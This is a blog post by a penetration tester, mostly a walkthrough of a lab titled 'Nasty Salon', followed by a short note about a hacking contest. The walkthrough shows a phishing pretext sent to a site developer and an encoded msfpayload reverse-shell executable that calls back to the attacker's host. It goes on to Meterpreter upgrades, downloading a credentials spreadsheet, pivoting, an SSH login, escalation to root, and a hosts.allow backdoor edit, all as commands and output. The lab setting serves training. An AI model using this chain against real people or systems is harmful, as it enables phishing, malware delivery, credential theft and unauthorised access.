What I do

I am an Information Risk Consultant and Penetration Tester. I specialize mostly in penetrating secure networks and computer systems, where I simulate an organized, professional attack against your organization, after which a detailed report summarizing the weaknesses and exploited vectors is produced. This will help you gain control over your infrastructure's security and maximize your protection.

Sunday, October 21, 2012

The Nasty Salon Lab


This lab was codenamed "nasty salon" because of the exploitation performed behind the firewall and the trust relationships this infrastructure has between clients and its administrator.

We know our target: it is a webserver, which means an httpd service is running.

The next thing we need to do is browse the site, learn about it and its owners, and find out which services and OS this webserver is running.

Nmap scan report for 192.168.1.202
Host is up (0.024s latency).
Not shown: 65350 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.2.17 ((FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2)
111/tcp open rpcbind 2-4 (rpc #100000)
848/tcp open mountd 1-3 (rpc #100005)
2049/tcp open nfs 2-3 (rpc #100003)
54544/tcp open tcpwrapped

We are up against a FreeBSD box with several ports open, including a tcpwrapped port; I wonder what that service is?
Let's check the webserver further, especially its directories, and see whether we have some other scripted apps or pages, because this looks like simple HTML and CSS. See below:
---------------------------------------------------------------------------
+ Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2
+ OpenSSL/0.9.8q appears to be outdated (current is at least 1.0.0d). OpenSSL 0.9.8r is also current.
+ mod_ssl/2.2.17 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ ETag header found on server, inode: 2004948, size: 13930, mtime: 0x4c7ecb4b7db40
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.17 OpenSSL/0.9.8q DAV/2 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
+ OSVDB-3268: /services/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3268: /styles/: Directory indexing found.
+ OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found.
+ 6448 items checked: 1 error(s) and 10 item(s) reported on remote host
+ End Time: 2012-08-24 13:33:18 (173 seconds)

This looks like a bigger task, because when we visited some of these links we rolled up a donut (nothing useful came back).

So let's try emailing the contact on this site, infosigmer at inbox dot com, as shown on the contacts page.

Now we wait for the reply; the most important things to look into are which mail client she or he uses to reply, plus the IPs and any other info that comes with it.

And we get a reply.


So her name is Annie, and she developed the site, so she must have unrestricted access to this server; put that in our notes. We also need to know her mail client, so we look at the source of the email.

X-Account-Key: account1
X-UIDL: 8690
X-Mozilla-Status: 0011
X-Mozilla-Status2: 00000000
X-Mozilla-Keys:
Received: from info

So she is using a Mozilla client, but is it on Linux or Windows? We need to identify this immediately, so let's set up our play here. This has to be a good social engineering attack, and we need the best performing act and strategy.

First of all, we need to set up a small webserver with some content she can be referred to, and we also need access to its logs.

We also need to social engineer her to see whether she really uses Windows or Unix, because someone who left IT to open a salon could be one of two things: tired of IT and used to hanging around Windows operating systems a lot, or doing some serious Unix/Linux stuff in their free time.

In the next email we need to direct her to our server, but we need to hide the IP since we don't have a domain registered yet. This mail has to be in HTML tags, with an href as below:

Hi Annie,

I lately came across some new designs from the West; I think you should
look into them.

Can I send you a link?


And we get the reply:

Afternoon,

Please do

Regards,

Annie

So we immediately send an HTML-coded email with a link to our rogue webserver:

Okay,

I have hosted them on my website here: <a href="http://192.168.1.113" target="_blank">link</a>

Please check them out; I can send a full URL for each of them later.

This email should look like this on her end as she browses on her machine.

So we watch our logs as follows:









chuksjonia ~ # cd /var/log/apache2
chuksjonia apache2 # ls
chuksjonia apache2 # tail -n 50 access.log -f

[23/Aug/2012:14:14:52 +0300] "GET / HTTP/1.1" 200 4107 "http://wm52.inbox.com/Lib/120528/mod_email.html" "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1"

She is on NT 5.1, which is Windows XP to 2003. So we have our info; it seems enough for now, and it's time to exploit her and we need to create a nice executable to get her onto our zombies. If you want to use a Java applet, even better.
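As an added example, not code from the original post, the following does mechanically what the author reads off by eye: it parses Apache combined-format access log lines, pulls out the referer host and browser, and maps the Windows NT version in the User-Agent to a product name. The sample log is constructed; its first line is the one quoted above, and the regex and version table are mine.

```python
import re
from typing import Optional

# Apache "combined" log format. The excerpt above has no leading
# "host ident authuser" fields, so that prefix is optional here
# (regex is mine, not from the original post).
LOG_RE = re.compile(
    r'^(?:(?P<host>\S+) \S+ \S+ )?'
    r'\[(?P<time>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\d+|-) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Windows NT kernel versions as they appear in User-Agent strings.
NT_VERSIONS = {
    "5.1": "Windows XP",
    "5.2": "Windows Server 2003 / XP x64",
    "6.0": "Windows Vista / Server 2008",
    "6.1": "Windows 7 / Server 2008 R2",
    "6.2": "Windows 8 / Server 2012",
    "6.3": "Windows 8.1 / Server 2012 R2",
    "10.0": "Windows 10 or later",
}


def classify_os(agent: str) -> str:
    """Coarse OS label from a User-Agent string."""
    m = re.search(r"Windows NT (\d+\.\d+)", agent)
    if m:
        return NT_VERSIONS.get(m.group(1), f"Windows NT {m.group(1)}")
    if "Mac OS X" in agent or "Macintosh" in agent:
        return "macOS"
    if "Android" in agent:
        return "Android"
    if "Linux" in agent:
        return "Linux"
    return "unknown"


def classify_browser(agent: str) -> str:
    """Browser family and version; only Firefox and Chrome are recognised."""
    for name in ("Firefox", "Chrome"):
        m = re.search(name + r"/(\d+(?:\.\d+)*)", agent)
        if m:
            return f"{name} {m.group(1)}"
    return "unknown"


def parse_line(line: str) -> Optional[dict]:
    """Return the parsed fields plus os/browser/referer_host, or None."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    d = m.groupdict()
    d["os"] = classify_os(d["agent"])
    d["browser"] = classify_browser(d["agent"])
    # The referer host shows where the click came from (here: webmail).
    r = re.match(r"https?://([^/]+)", d["referer"])
    d["referer_host"] = r.group(1) if r else None
    return d


def summarize(log_text: str) -> list:
    """Parse every line of an access log, skipping lines that do not parse."""
    return [p for p in (parse_line(l) for l in log_text.splitlines()) if p]


# Constructed sample: line 1 is the one quoted in the post, line 2 is invented,
# line 3 shows that junk is skipped rather than crashing the parser.
SAMPLE_LOG = """\
[23/Aug/2012:14:14:52 +0300] "GET / HTTP/1.1" 200 4107 "http://wm52.inbox.com/Lib/120528/mod_email.html" "Mozilla/5.0 (Windows NT 5.1; rv:13.0) Gecko/20100101 Firefox/13.0.1"
10.0.0.7 - - [23/Aug/2012:14:15:10 +0300] "GET /styles/site.css HTTP/1.1" 200 812 "http://192.168.1.113/" "Mozilla/5.0 (X11; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0"
this line is not a log entry
"""

if __name__ == "__main__":
    for hit in summarize(SAMPLE_LOG):
        print(hit["time"], hit["request"], "from", hit["referer_host"],
              "->", hit["os"], "/", hit["browser"])
```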

Here we go: we are going to use windows/shell/reverse_tcp, since it is stealthier than most of the others, then encode it with several encoders as seen below, and we should have an executable that might work against our target.


chuksjonia msf3 # msfpayload windows/shell/reverse_tcp LHOST=192.168.1.113 LPORT=443 R | msfencode -e x86/shikata_ga_nai -t raw -c 10 | msfencode -e x86/call4_dword_xor -t raw -c 10 | msfencode -e x86/countdown -t exe > /var/www/styleview.exe

[*] x86/shikata_ga_nai succeeded with size 317 (iteration=1)
[*] x86/shikata_ga_nai succeeded with size 344 (iteration=2)
[*] x86/shikata_ga_nai succeeded with size 371 (iteration=3)
[*] x86/shikata_ga_nai succeeded with size 398 (iteration=4)
[*] x86/shikata_ga_nai succeeded with size 425 (iteration=5)
[*] x86/shikata_ga_nai succeeded with size 452 (iteration=6)
[*] x86/shikata_ga_nai succeeded with size 479 (iteration=7)
[*] x86/shikata_ga_nai succeeded with size 506 (iteration=8)
[*] x86/shikata_ga_nai succeeded with size 533 (iteration=9)
[*] x86/shikata_ga_nai succeeded with size 560 (iteration=10)
[*] x86/call4_dword_xor succeeded with size 586 (iteration=1)
[*] x86/call4_dword_xor succeeded with size 614 (iteration=2)
[*] x86/call4_dword_xor succeeded with size 642 (iteration=3)
[*] x86/call4_dword_xor succeeded with size 670 (iteration=4)
[*] x86/call4_dword_xor succeeded with size 698 (iteration=5)
[*] x86/call4_dword_xor succeeded with size 726 (iteration=6)
[*] x86/call4_dword_xor succeeded with size 754 (iteration=7)
[*] x86/call4_dword_xor succeeded with size 782 (iteration=8)
[*] x86/call4_dword_xor succeeded with size 810 (iteration=9)
[*] x86/call4_dword_xor succeeded with size 838 (iteration=10)
[*] x86/countdown succeeded with size 856 (iterati

We have the handler waiting in our Metasploit as below.

     
So let's write our email now, and have this lady click on this executable.

And it would look like this:

Just open the download, and they should work for you. If the link doesn't work for you, it could be that you lack the
software, so I can get you another link later for the same.

Hope to come to your salon soon and have a makeover :D

And now we wait.

And wow, we have her machine:

msf exploit(handler) > exploit

[*] Started reverse handler on 192.168.1.113:443
[*] Starting the payload handler...
[*] Sending stage (240 bytes) to 192.168.1.106
[*] Command shell session 1 opened (192.168.1.113:443 -> 192.168.1.106:54498) at 2012-08-23 14:40:33 +0300

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Program Files\Mozilla Firefox>


We need to explore this machine and see what it has and what we can use. First things first, we need to find out which service is on 54544, the tcpwrapped port; it might be of use.

The machine is behind a router:

C:\Program Files\Mozilla Firefox>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 10.0.2.15
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 10.0.2.2

That is the internal network Annie is using, with the router at 10.0.2.2.

C:\Program Files>telnet 192.168.1.202 54544
telnet 192.168.1.202 54544

It seems that port is accessible to her, but we can't figure out what it is, since we are not in an interactive shell. Let's check which connections we have:

C:\Program Files>netstat -an
netstat -an

Active Connections

Proto Local Address Foreign Address State
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 10.0.2.15:139 0.0.0.0:0 LISTENING
TCP 10.0.2.15:1134 173.194.78.113:80 ESTABLISHED
TCP 10.0.2.15:1163 192.168.1.202:54544 ESTABLISHED
TCP 10.0.2.15:1279 192.168.1.113:443 ESTABLISHED
TCP 10.0.2.15:1287 64.135.83.52:80 ESTABLISHED
TCP 10.0.2.15:1288 64.135.83.52:80 FIN_WAIT_2
TCP 127.0.0.1:1025 0.0.0.0:0 LISTENING


Let's go to her Documents and Desktop folders and also check what is running on this machine.

Desktop:

C:\Documents and Settings\annie\Desktop>dir
dir

Volume in drive C has no label.
Volume Serial Number is B49F-7CC8

Directory of C:\Documents and Settings\annie\Desktop

08/07/2012 11:55 PM <DIR> .
08/07/2012 11:55 PM <DIR> ..
0 File(s) 0 bytes
2 Dir(s) 7,588,036,608 bytes free

Documents folder:

C:\Documents and Settings\annie\My Documents>dir
dir

Volume in drive C has no label.
Volume Serial Number is B49F-7CC8

Directory of C:\Documents and Settings\annie\My Documents

08/23/2012 10:59 AM <DIR> .
08/23/2012 10:59 AM <DIR> ..
08/23/2012 02:43 PM <DIR> Downloads
08/23/2012 10:58 AM 954,880 images.tar
08/23/2012 10:46 AM <DIR> My Music
08/23/2012 10:46 AM <DIR> My Pictures
08/23/2012 10:37 AM 23,040 updatedcredentials.xls
2 File(s) 977,920 bytes
5 Dir(s) 7,588,036,608 bytes free



Interesting information there. We need that Excel file; it could contain passwords or something even more interesting.


Let's test whether ftp runs:

C:\Documents and Settings\annie\My Documents>ftp /?
ftp> quit

Aha, that seems to work; we might need it later.


Wait, if she uses this machine to log into the server, there must be software to do that. Let's check the PIDs:

C:\>tasklist
tasklist

Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 16 K
System 4 Console 0 36 K
smss.exe 504 Console 0 44 K
csrss.exe 568 Console 0 2,144 K
winlogon.exe 592 Console 0 4,240 K
services.exe 636 Console 0 1,060 K
lsass.exe 648 Console 0 1,760 K
svchost.exe 808 Console 0 1,528 K
svchost.exe 884 Console 0 1,356 K
svchost.exe 976 Console 0 11,096 K
svchost.exe 1024 Console 0 1,152 K
svchost.exe 1068 Console 0 220 K
spoolsv.exe 1372 Console 0 760 K
svchost.exe 1472 Console 0 152 K
alg.exe 120 Console 0 200 K
explorer.exe 272 Console 0 8,872 K
wscntfy.exe 216 Console 0 84 K
firefox.exe 784 Console 0 77,708 K
putty.exe 560 Console 0 1,596 K

And we have PuTTY, PID 560. Let's check whether it's fully installed, and this seems easier than we thought:

Directory of C:\Program Files\PuTTY

08/10/2012 08:36 AM <DIR> .
08/10/2012 08:36 AM <DIR> ..
12/10/2011 12:35 PM 1,318 LICENCE
12/10/2011 12:35 PM 139,264 pageant.exe
12/10/2011 12:35 PM 303,104 plink.exe
12/10/2011 12:35 PM 315,392 pscp.exe
12/10/2011 12:35 PM 327,680 psftp.exe
12/10/2011 12:35 PM 446,930 putty.chm
12/10/2011 12:35 PM 32,093 putty.cnt
12/10/2011 12:35 PM 483,328 putty.exe
12/10/2011 12:35 PM 657,290 putty.hlp
12/10/2011 12:35 PM 180,224 puttygen.exe
01/23/2007 11:38 AM 1,623 README.txt
08/09/2012 09:39 AM 3,134 unins000.dat
08/09/2012 09:39 AM 721,838 unins000.exe
11/16/2004 10:14 PM 103 website.url
14 File(s) 3,613,321 bytes
2 Dir(s) 7,587,950,592 bytes free


This might become an issue; we need something to take it faster, like a Meterpreter shell.

We need to upgrade this to a Meterpreter shell, so open the handler again and make sure your session doesn't interact with the compromised box after you put the older shell in the background.

msf exploit(handler) > exploit -z -j

Now we need to make sure we get Meterpreter up when we do sessions -u, but at the same time have it run against our local host as below. So execute the binary again from the Downloads folder on the compromised box via the old shell, and background it.

[*] Started reverse handler on 192.168.1.113:443
[*] Starting the payload handler...
msf exploit(handler) > setg LHOST 192.168.1.113
LHOST => 192.168.1.113
msf exploit(handler) > setg LPORT 443
LPORT => 443
msf exploit(handler) >
[*] Sending stage (240 bytes) to 192.168.1.106
[*] Command shell session 5 opened (192.168.1.113:443 -> 192.168.1.106:54583) at 2012-08-23 15:38:15 +0300


Now upgrade:

msf exploit(handler) > sessions -u 5

[*] Started reverse handler on 192.168.1.113:443
[*] Starting the payload handler...
[*] Command Stager progress - 1.66% done (1699/102108 bytes)
[*] Command Stager progress - 3.33% done (3398/102108 bytes)
[*] Command Stager progress - 4.99% done (5097/102108 bytes)
[*] Command Stager progress - 6.66% done (6796/102108 bytes)
[*] Command Stager progress - 8.32% done (8495/102108 bytes)
[*] Command Stager progress - 9.98% done (10194/102108 bytes)
[*] Command Stager progress - 11.65% done (11893/102108 bytes)
[*] Command Stager progress - 13.31% done (13592/102108 bytes)
[*] Command Stager progress - 14.98% done (15291/102108 bytes)
[*] Command Stager progress - 16.64% done (16990/102108 bytes)
[*] Command Stager progress - 18.30% done (18689/102108 bytes)
[*] Command Stager progress - 19.97% done (20388/102108 bytes)
[*] Command Stager progress - 21.63% done (22087/102108 bytes)
[*] Command Stager progress - 23.29% done (23786/102108 bytes)
[*] Command Stager progress - 24.96% done (25485/102108 bytes)
[*] Command Stager progress - 26.62% done (27184/102108 bytes)
[*] Command Stager progress - 28.29% done (28883/102108 bytes)
[*] Command Stager progress - 29.95% done (30582/102108 bytes)
[*] Command Stager progress - 31.61% done (32281/102108 bytes)
[*] Command Stager progress - 33.28% done (33980/102108 bytes)
[*] Command Stager progress - 34.94% done (35679/102108 bytes)
[*] Command Stager progress - 36.61% done (37378/102108 bytes)
[*] Command Stager progress - 38.27% done (39077/102108 bytes)
[*] Command Stager progress - 39.93% done (40776/102108 bytes)
[*] Command Stager progress - 41.60% done (42475/102108 bytes)
[*] Command Stager progress - 43.26% done (44174/102108 bytes)
[*] Command Stager progress - 44.93% done (45873/102108 bytes)
[*] Command Stager progress - 46.59% done (47572/102108 bytes)
[*] Command Stager progress - 48.25% done (49271/102108 bytes)
[*] Command Stager progress - 49.92% done (50970/102108 bytes)
[*] Command Stager progress - 51.58% done (52669/102108 bytes)
[*] Command Stager progress - 53.25% done (54368/102108 bytes)
[*] Command Stager progress - 54.91% done (56067/102108 bytes)
[*] Command Stager progress - 56.57% done (57766/102108 bytes)
[*] Command Stager progress - 58.24% done (59465/102108 bytes)
[*] Command Stager progress - 59.90% done (61164/102108 bytes)
[*] Command Stager progress - 61.57% done (62863/102108 bytes)
[*] Command Stager progress - 63.23% done (64562/102108 bytes)
[*] Command Stager progress - 64.89% done (66261/102108 bytes)
[*] Command Stager progress - 66.56% done (67960/102108 bytes)
[*] Command Stager progress - 68.22% done (69659/102108 bytes)
[*] Command Stager progress - 69.88% done (71358/102108 bytes)
[*] Command Stager progress - 71.55% done (73057/102108 bytes)
[*] Command Stager progress - 73.21% done (74756/102108 bytes)
[*] Command Stager progress - 74.88% done (76455/102108 bytes)
[*] Command Stager progress - 76.54% done (78154/102108 bytes)
[*] Command Stager progress - 78.20% done (79853/102108 bytes)
[*] Command Stager progress - 79.87% done (81552/102108 bytes)
[*] Command Stager progress - 81.53% done (83251/102108 bytes)
[*] Command Stager progress - 83.20% done (84950/102108 bytes)
[*] Command Stager progress - 84.86% done (86649/102108 bytes)
[*] Command Stager progress - 86.52% done (88348/102108 bytes)
[*] Command Stager progress - 88.19% done (90047/102108 bytes)
[*] Command Stager progress - 89.85% done (91746/102108 bytes)
[*] Command Stager progress - 91.52% done (93445/102108 bytes)
[*] Command Stager progress - 93.18% done (95144/102108 bytes)
[*] Command Stager progress - 94.84% done (96843/102108 bytes)
[*] Command Stager progress - 96.51% done (98542/102108 bytes)
[*] Command Stager progress - 98.15% done (100216/102108 bytes)
[*] Command Stager progress - 99.78% done (101888/102108 bytes)
[*] Sending stage (752128 bytes) to 192.168.1.106
[*] Command Stager progress - 100.00% done (102108/102108 bytes)
msf exploit(handler) > [*] Meterpreter session 6 opened (192.168.1.113:443 -> 192.168.1.106:54584) at 2012-08-23 15:40:17 +0300

Now you should have three sessions by now; if you do:

msf exploit(handler) > sessions -l

Active sessions
===============

Id Type Information Connection
-- ---- ----------- ----------
4 shell windows Microsoft Windows XP [Version 5.1.2600] 192.168.1.113:443 -> 192.168.1.106:54574 (192.168.1.106)
5 shell windows Microsoft Windows XP [Version 5.1.2600] 192.168.1.113:443 -> 192.168.1.106:54583 (192.168.1.106)
6 meterpreter x86/win32 ALICE_BUKU\annie @ ALICE_BUKU 192.168.1.113:443 -> 192.168.1.106:54584 (10.0.2.15)

We need to interact with the awesome Meterpreter and get those files:

msf exploit(handler) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > cd \
meterpreter > pwd
meterpreter > cd "Documents and Settings"
meterpreter > pwd
C:\Documents and Settings

So we go all the way:

meterpreter > cd "My Documents"
meterpreter > pwd
C:\Documents and Settings\annie\My Documents
meterpreter > download updatedcredentials.xls
[*] downloading: updatedcredentials.xls -> updatedcredentials.xls
[*] downloaded : updatedcredentials.xls -> updatedcredentials.xls

And now we have it, so let's see what's there.

Looks like passwords to me. We have to find the right port, and I suspect port 54544. Let's route our session through, because Annie's machine is allowed to connect to this port.

meterpreter > run get_local_subnets
Local subnet: 10.0.2.0/255.255.255.0

[*] Backgrounding session 6...
msf exploit(handler) > route add 10.0.2.0 255.255.255.0 6
[*] Route added
msf exploit(handler) > route print

Active Routing Table
====================

Subnet Netmask Gateway
------ ------- -------
10.0.2.0 255.255.255.0 Session 6

Let's scan the server now on port 54544:

msf auxiliary(tcp) > run

[*] 192.168.1.202:54544 - TCP OPEN
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Let's try to log in:

msf auxiliary(ssh_login) > set PASSWORD 'the bsd box as u wish'
PASSWORD => the bsd box as u wish
msf auxiliary(ssh_login) > run

[*] 192.168.1.202:54544 SSH - Starting bruteforce
[*] 192.168.1.202:54544 SSH - [1/3] - Trying: username: 'annie' with password: ''
[-] 192.168.1.202:54544 SSH - [1/3] - Retrying 'annie':'' due to connection error
[-] 192.168.1.202:54544 SSH - [1/3] - Retrying 'annie':'' due to connection error
[-] 192.168.1.202:54544 SSH - [1/3] - Retrying 'annie':'' due to connection error
[-] 192.168.1.202:54544 SSH - [1/3] - Connection timed out
[-] 192.168.1.202:54544 SSH - [1/3] - Bruteforce cancelled against this service.
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

It seems we are not allowed to brute-force.

So let's go to a shell:

msf auxiliary(ssh_login) > sessions -i 6
[*] Starting interaction with 6...

meterpreter > shell

And we need the PuTTY binaries so that we can log into this box; let's try the passwords we have:

C:\Program Files\PuTTY>plink -P 54544 192.168.1.202
plink -P 54544 192.168.1.202
login as: annie

Using keyboard-interactive authentication.
Password:
Using keyboard-interactive authentication.
Password:all changes

Last login: Thu Aug 23 19:10:48 2012 from 192.168.1.106
Copyright (c) 1980, 1983, 1986, 1988, 1990, 1991, 1993, 1994
The Regents of the University of California. All rights reserved.

FreeBSD 8.2-RELEASE (GENERIC) #0: Fri Feb 18 02:24:46 UTC 2011

Welcome to FreeBSD!

Before seeking technical support, please use the following resources:

o Security advisories and updated errata information for all releases are
at http://www.FreeBSD.org/releases/ - always consult the ERRATA section
for your release first as it's updated frequently.

o The Handbook and FAQ documents are at http://www.FreeBSD.org/ and,
along with the mailing lists, can be searched by going to
http://www.FreeBSD.org/search/. If the doc distribution has
been installed, they're also available formatted in /usr/share/doc.

If you still have a question or problem, please take the output of
`uname -a', along with any relevant error messages, and email it
as a question to the questions@FreeBSD.org mailing list. If you are

[annie@office ~]$

And we are already logged in.

So we can check whether the other password belongs to the root user:

[annie@office ~]$ su -l
su -l
Password:the bsd box as u wish

office#

And we are this far in.




Next up, we need to be able to reach this service from our own machine, so we check /etc/rc.conf and also /etc/hosts.allow.

Edit this file with vi and add the configuration for our IP at the top as follows:

sshd : 192.168.1.113 : allow
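The hosts.allow edit above is exactly the kind of change a host-integrity check on the server should catch. As an added example (not from the original post), here is a small auditor that parses tcp_wrappers hosts.allow syntax and flags every sshd rule that allows a client outside a known baseline; the file contents and the baseline prefix 10.0.2. are constructed.

```python
import re
from dataclasses import dataclass
from typing import List, Set


@dataclass
class Rule:
    lineno: int            # first physical line of the rule
    daemons: List[str]     # lower-cased daemon_list
    clients: List[str]     # client_list as written
    option: str            # "allow", "deny", or "" (tcp_wrappers default)


def parse_hosts_allow(text: str) -> List[Rule]:
    """Parse tcp_wrappers syntax: 'daemon_list : client_list [: option]'.
    Comments, blank lines and backslash continuations are handled."""
    rules: List[Rule] = []
    logical, start = "", 0
    for n, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].rstrip()
        if not line.strip() and not logical:
            continue
        if not logical:
            start = n
        if line.endswith("\\"):
            logical += line[:-1] + " "
            continue
        logical += line
        fields = [f.strip() for f in logical.split(":")]
        logical = ""
        if len(fields) < 2:
            continue  # malformed; tcp_wrappers ignores it too
        daemons = [d for d in re.split(r"[\s,]+", fields[0].lower()) if d]
        clients = [c for c in re.split(r"[\s,]+", fields[1]) if c]
        option = fields[2].lower() if len(fields) > 2 else ""
        rules.append(Rule(start, daemons, clients, option))
    return rules


def audit_sshd(text: str, expected_clients: Set[str]) -> List[str]:
    """Flag every rule that lets sshd accept a client outside the baseline.
    Wrappers evaluate first match, so a stray allow at the top of the file
    wins over everything below it; that is the shape of the edit in the post."""
    findings = []
    for r in parse_hosts_allow(text):
        if not ({"sshd", "all"} & set(r.daemons)):
            continue
        if r.option.startswith("deny"):
            continue
        for c in r.clients:
            if c.upper() == "ALL" or c not in expected_clients:
                findings.append(f"line {r.lineno}: sshd allowed from {c!r}")
    return findings


# Constructed file modelled on the post: line 3 is the attacker's addition,
# the rest is a plausible original. Baseline: the salon LAN prefix only.
SAMPLE_HOSTS_ALLOW = """\
# /etc/hosts.allow (constructed sample)
# first match wins
sshd : 192.168.1.113 : allow
sshd : 10.0.2. : allow
sshd : ALL : deny
"""
BASELINE = {"10.0.2."}

if __name__ == "__main__":
    for finding in audit_sshd(SAMPLE_HOSTS_ALLOW, BASELINE):
        print(finding)
```

Run from cron and diffed against the previous run, the findings list doubles as a change alert for the file itself.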




After that, if we scan port 54544 from our local machine, we should see the service up:

# nmap -sV -PN 192.168.1.202 -p54544

Starting Nmap 5.21 ( http://nmap.org ) at 2012-08-23 16:36 EAT
Nmap scan report for 192.168.1.202
Host is up (0.088s latency).
PORT STATE SERVICE VERSION
54544/tcp open ssh OpenSSH 5.4p1 (FreeBSD 20100308; protocol 2.0)
MAC Address: 68:5D:43:09:97:23 (Unknown)
Service Info: OS: FreeBSD

And we log in as annie.

     










GAME OVER

    Friday, October 12, 2012

    HackBattle2012 The rerun

HackBattle 2012, which started last week, opened with the Blackhat team (Blackdiamond) gaining access to the two servers faster than we expected. They were followed by team Ownerz and team Takerz. We had set up several vulnerabilities, which were fully tested and worked well for each network. After the blackhats took over, they set up several backdoors and pieces of malware, which the team that took over the servers was expected to identify and quarantine forensically before the 8th of October 2012. As that time approached, most of the teams realized that team Blackdiamond had already gained access, and they wondered how they had done it.

On the 8th in the afternoon, team Blackdiamond came back in, pkilled every process on each TTY, and regained control of the servers, therefore winning this year.

So on the 9th we decided to bring the game back with a new scenario, as below. We are calling it HackBattle 2012 'The Rerun'.





So the scenario is as follows: we have a network with two servers, both webservers, one acting as a blog server and the other as a normal website. Both of these servers are vulnerable to different flaws, e.g. SQLi, LFI, information disclosure etc.

These servers are controlled by several users sitting behind their laptops, and it's business as usual. This penetration scenario is BLACKBOX, so all attackers are supposed to be covert and should use any means necessary to gain access to the infrastructure.

The above is made simpler and should help all the groups understand some pentest skills as they work together and exchange ideas. A kind of knowledge transfer for everyone.

I am also giving out small clues and directions to those who ask me what to look for, etc.

Enjoy the game, and remember: the more you practice, the better you get.

See all teams tomorrow at the CIO East Africa office.

    Cheers,

    ./Chucks